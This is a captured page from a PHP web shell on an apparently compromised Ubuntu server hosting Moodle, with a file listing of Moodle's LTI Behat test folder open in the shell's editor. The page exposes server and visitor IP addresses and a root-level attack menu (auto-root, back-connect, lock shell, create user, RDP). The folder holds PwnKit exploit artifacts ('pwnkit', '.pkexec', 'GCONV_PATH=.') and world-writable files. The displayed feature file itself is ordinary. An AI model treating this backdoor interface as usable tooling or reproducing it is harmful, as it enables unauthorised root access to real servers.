Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
lti /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
addtool.feature
1.91
KB
-rwxrwxrwx
addtype.feature
2.78
KB
-rwxrwxrwx
backup_restore.feature
4.29
KB
-rwxrwxrwx
contentitem.feature
4.95
KB
-rwxrwxrwx
contentitemregistration.featur...
1.55
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renametool.feature
905
B
-rwxrwxrwx
toolconfigure.feature
1.25
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contentitemregistration.feature
@mod @mod_lti Feature: Create/edit tool configuration that has Content-Item support In order to provide external tools that support the Content-Item Message type for teachers and learners As an admin I need to be able to configure external tool registrations that support the Content-Item Message type. Background: Given I log in as "admin" And I navigate to "Plugins > Activity modules > External tool > Manage tools" in site administration Scenario: Verifying ContentItemSelectionRequest selection support in external tool registration When I follow "Manage external tool registrations" And I follow "Configure a new external tool registration" Then I should see "ContentItemSelectionRequest" in the "Capabilities" "select" @javascript Scenario: Creating and editing tool configuration that has Content-Item support When I follow "configure a tool manually" And I set the field "Tool name" to "Test tool" And I set the field "Tool URL" to local url "/mod/lti/tests/fixtures/tool_provider.php" And I set the field "Tool configuration usage" to "Show in activity chooser and as a preconfigured tool" And I expand all fieldsets And I set the field "Content-Item Message" to "1" And I press "Save changes" And I follow "Edit" And I expand all fieldsets Then the field "Content-Item Message" matches value "1" And I set the field "Content-Item Message" to "0" And I press "Save changes" And I follow "Edit" And I expand all fieldsets And the field "Content-Item Message" matches value "0"
Close